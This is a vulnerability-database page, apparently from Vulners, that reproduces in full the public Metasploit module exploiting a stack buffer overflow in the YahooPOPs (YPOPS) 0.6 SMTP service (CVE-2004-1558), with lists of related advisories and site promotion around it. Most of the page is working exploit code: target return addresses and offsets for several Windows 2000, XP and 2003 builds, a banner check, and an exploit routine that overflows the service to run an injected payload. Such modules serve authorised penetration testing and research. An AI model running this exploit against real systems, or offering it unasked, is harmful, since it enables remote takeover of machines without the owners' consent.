Lucene search
K

YPOPS 0.6 Buffer Overflow

🗓️ 12 Oct 2006 03:24:31Reported by acaro <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

YPOPS 0.6 Buffer Overflow in SMTP Servic

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
YahooPOPs! Proxy Detection
27 Sep 200400:00
nessus
Circl
CVE-2004-1558
9 May 201000:00
circl
CVE
CVE-2004-1558
20 Feb 200505:00
cve
Cvelist
CVE-2004-1558
20 Feb 200505:00
cvelist
Exploit DB
YahooPOPs (YPOPS) 0.6 - Remote Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
NVD
CVE-2004-1558
31 Dec 200405:00
nvd
Packet Storm
YPOPS 0.6 Buffer Overflow
26 Nov 200900:00
packetstorm
Prion
Design/Logic Flaw
29 Jan 202404:15
prion
Positive Technologies
PT-2004-2466 · Yahoo · Ypops!
31 Dec 200400:00
ptsecurity
RedhatCVE
CVE-2024-24736
23 May 202509:38
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Smtp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'YPOPS 0.6 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the YPOPS POP3
        service.

        This is a classic stack buffer overflow for YPOPS version 0.6.
        Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
        jmp ebx opcode in ws_32.dll
      },
      'Author'         => [ 'acaro <acaro[at]jervus.it>' ],
      'References'     =>
        [
          [ 'CVE', '2004-1558'],
          [ 'OSVDB', '10367'],
          [ 'BID', '11256'],
          [ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 1200,
          'BadChars' => "\x00\x25",
          'MinNops'  => 106,
        },
      'Targets'        =>
        [
          [ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
          [ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
          [ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
          [ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
          [ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
          [ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
          [ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
          [ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
          [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
          [ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
          [ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
          [ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
        ],
      'DisclosureDate' => '2004-09-27'))
  end

  def check
    connect
    disconnect

    banner.gsub!(/\n/, '')

    if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
      vprint_status("Vulnerable SMTP server: #{banner}")
      return Exploit::CheckCode::Detected
    end

    vprint_status("Unknown SMTP server: #{banner}")
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    pattern =
      rand_text_alpha(target['Offset'] - payload.encoded.length) +
      payload.encoded +
      [target.ret].pack('V') +
      "\n"

    print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

    sock.put(pattern)

    handler
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.7Low risk
Vulners AI Score0.7
CVSS 27.5
EPSS0.71107
17